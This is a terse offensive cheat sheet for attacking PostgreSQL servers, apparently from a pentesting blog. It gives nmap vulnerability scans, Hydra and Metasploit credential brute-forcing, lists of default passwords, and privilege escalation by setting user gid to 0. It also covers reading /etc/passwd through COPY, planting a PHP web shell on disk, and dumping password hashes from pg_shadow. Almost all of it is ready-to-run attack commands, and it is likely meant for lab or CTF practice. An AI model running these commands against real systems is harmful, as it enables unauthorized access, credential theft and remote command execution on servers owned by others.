nmap Scanning
nmap -sC -sV --script vuln,vulners --script-args mincvss=7.0 -p5432,5433 -Pn 10.10.10.10
#make sure to check for vulnerable versions
Bruteforcing Postgres Creds
#Using Metasploit
use auxiliary/scanner/postgres/postgres_login
#using Hydra
hydra -L /usr/share/metasploit-framework/data/wordlists/postgres_default_user.txt -P /usr/share/metasploit-framework/data/wordlists/postgres_default_pass.txt 10.10.10.10 postgres
Default Username & Passwords:
● postgres : postgres
● postgres : password
● postgres : admin
● admin : admin
● admin : password
root : root
#or for a better wordlist
cp /usr/share/wordlists/seclists/Passwords/Default-Credentials/postgres-betterdefaultpasslist.txt .
cat postgres-betterdefaultpasslist.txt | cut -f1 -d":" > user.txt
cat postgres-betterdefaultpasslist.txt | cut -f2 -d":" > pass.txt
Accessing remote Postgresql server
psql -h 10.10.10.10 -U USERNAME
psql -h <host> -U <username> -d <database>
PrivEsc when Postgresql Is Running As Root
psql -h 127.0.0.1 -d DB_NAME -U unixusrmgr //Enter Password later
\dt \\List Tables
\dp \\Get DB privileges
select * from table_name; \\ Check Home Directory (just in case)
Example to Update a value in all rows:
update table_name set gid=0 where gid=1001; \Giving Root Privs
or
insert into passwd_table (username,passwd,gid,homedir) values ('freak','openssl_encrypted password',0,'/');
Reading files via Postgres
use auxiliary/admin/postgres/postgres_readfile
#Downloading a file
> create table new(file TEXT);
COPY new FROM '/etc/passwd';
select * from hack;
#Uploading a file
create table new(put TEXT);
INSERT INTO new(put) VALUES('<?php @system("$_GET[cmd]");?>');
COPY new(put) TO '/tmp/temp.php';
Dumping Hashes
auxiliary/admin/postgres/postgres_sql
>select usename, passwd from pg_shadow;
auxiliary/scanner/postgres/postgres_hashdump
Comments
Post a Comment